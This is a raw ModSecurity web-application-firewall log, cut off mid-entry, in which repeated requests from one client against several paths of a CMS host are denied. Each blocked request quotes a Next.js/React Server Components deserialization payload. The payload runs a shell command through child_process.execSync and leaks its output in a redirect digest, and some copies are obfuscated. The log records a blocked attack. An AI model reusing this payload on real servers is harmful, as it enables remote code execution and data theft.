ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _oqxe=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _sbul=Buffer.from(_oqxe).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_sbul};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "aX1G372Eyysfe77nnmW6RgAAAow"] [Sat Jan 31 02:03:43.668838 2026] [:error] [pid 29377:tid 29381] [client 195.178.110.31:59590] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _cbbv=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _zsib=Buffer.from(_cbbv).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_zsib};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aX1G372Eyysfe77nnmW6RwAAAoI"] [Sat Jan 31 02:03:43.697701 2026] [:error] [pid 29377:tid 29390] [client 195.178.110.31:59590] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _oout=process['main' 'Module']['req' 'uire']('chi' 'ld_pro' 'cess')['exec' 'Sync'](Buffer.from('aWQ=','base64').toString()).toString().trim();var _iahp=Buffer.from(_oout).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_iahp};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aX1G372Eyysfe77nnmW6SAAAAos"] [Sat Jan 31 02:03:43.730907 2026] [:error] [pid 29377:tid 29393] [client 195.178.110.31:59590] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _hpoa=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _tmab=Buffer.from(_hpoa).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_tmab};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/en/"] [unique_id "aX1G372Eyysfe77nnmW6SgAAAo4"] [Sat Jan 31 02:03:43.765040 2026] [:error] [pid 29377:tid 29402] [client 195.178.110.31:59590] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _fmlv=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _obvk=Buffer.from(_fmlv).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_obvk};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/app/"] [unique_id "aX1G372Eyysfe77nnmW6SwAAApc"] [Sat Jan 31 02:03:43.800768 2026] [:error] [pid 29377:tid 29403] [client 195.178.110.31:59590] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _uako=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _ckkl=Buffer.from(_uako).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_ckkl};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/api/"] [unique_id "aX1G372Eyysfe77nnmW6TQAAApg"] [Sat Jan 31 02:03:43.829418 2026] [:error] [pid 29377:tid 29384] [client 195.178.110.31:59590] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _sbsn=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _ktlw=Buffer.from(_sbsn).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_ktlw};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "aX1G372Eyysfe77nnmW6TgAAAoU"] [Sat Jan 31 02:03:43.859886 2026] [:error] [pid 29377:tid 29397] [client 195.178.110.31:59590] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _bshr=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _whvx=Buffer.from(_bshr).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_whvx};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aX1G372Eyysfe77nnmW6TwAAApI"] [Sat Jan 31 02:03:43.888932 2026] [:error] [pid 29377:tid 29392] [client 195.178.110.31:59590] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _qfrt=process['main' 'Module']['req' 'uire']('chi' 'ld_pro' 'cess')['exec' 'Sync'](Buffer.from('aWQ=','base64').toString()).toString().trim();var _ribo=Buffer.from(_qfrt).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_ribo};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aX1G372Eyysfe77nnmW6UAAAAo0"] [Sat Jan 31 02:03:43.920321 2026] [:error] [pid 29377:tid 29380] [client 195.178.110.31:59590] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _pkqp=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _mgkr=Buffer.from(_pkqp).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_mgkr};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/en/"] [unique_id "aX1G372Eyysfe77nnmW6UQAAAoE"] [Sat Jan 31 02:03:43.949431 2026] [:error] [pid 29377:tid 29399] [client 195.178.110.31:59590] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _xmvg=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _gfnt=Buffer.from(_xmvg).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_gfnt};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/app/"] [unique_id "aX1G372Eyysfe77nnmW6UgAAApQ"] [Sat Jan 31 02:03:43.976332 2026] [:error] [pid 29377:tid 29389] [client 195.178.110.31:59590] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _dwlp=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _lacs=Buffer.from(_dwlp).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_lacs};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/api/"] [unique_id "aX1G372Eyysfe77nnmW6UwAAAoo"] [Sat Jan 31 02:03:44.004499 2026] [:error] [pid 29377:tid 29388] [client 195.178.110.31:59590] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _hzuy=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _jrya=Buffer.from(_hzuy).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_jrya};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "aX1G372Eyysfe77nnmW6VAAAAok"] [Sun Feb 01 05:03:05.852352 2026] [:error] [pid 16364:tid 16384] [client 195.178.110.31:43266] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _fmgb=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _molf=Buffer.from(_fmgb).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_molf};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aX7CaS0X30NspmATJTwY0wAAANI"] [Sun Feb 01 05:03:05.881653 2026] [:error] [pid 16364:tid 16377] [client 195.178.110.31:43266] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _ockz=process['main' 'Module']['req' 'uire']('chi' 'ld_pro' 'cess')['exec' 'Sync'](Buffer.from('aWQ=','base64').toString()).toString().trim();var _ponj=Buffer.from(_ockz).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_ponj};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aX7CaS0X30NspmATJTwY1AAAAMs"] [Sun Feb 01 05:03:05.910767 2026] [:error] [pid 16364:tid 16370] [client 195.178.110.31:43266] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _hjks=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _mywn=Buffer.from(_hjks).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_mywn};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/en/"] [unique_id "aX7CaS0X30NspmATJTwY1gAAAMQ"] [Sun Feb 01 05:03:05.939587 2026] [:error] [pid 16364:tid 16366] [client 195.178.110.31:43266] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _tfdb=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _ebme=Buffer.from(_tfdb).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_ebme};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/app/"] [unique_id "aX7CaS0X30NspmATJTwY1wAAAMA"] [Sun Feb 01 05:03:05.968705 2026] [:error] [pid 16364:tid 16386] [client 195.178.110.31:43266] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _cbzj=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _jzvy=Buffer.from(_cbzj).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_jzvy};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/api/"] [unique_id "aX7CaS0X30NspmATJTwY2AAAANQ"] [Sun Feb 01 05:03:05.997221 2026] [:error] [pid 16364:tid 16382] [client 195.178.110.31:43266] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _cozu=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _lbnq=Buffer.from(_cozu).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_lbnq};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "aX7CaS0X30NspmATJTwY2QAAANA"] [Sun Feb 01 05:03:06.026155 2026] [:error] [pid 16364:tid 16369] [client 195.178.110.31:43266] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _gbem=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _keqe=Buffer.from(_gbem).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_keqe};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aX7Cai0X30NspmATJTwY2gAAAMM"] [Sun Feb 01 05:03:06.054736 2026] [:error] [pid 16364:tid 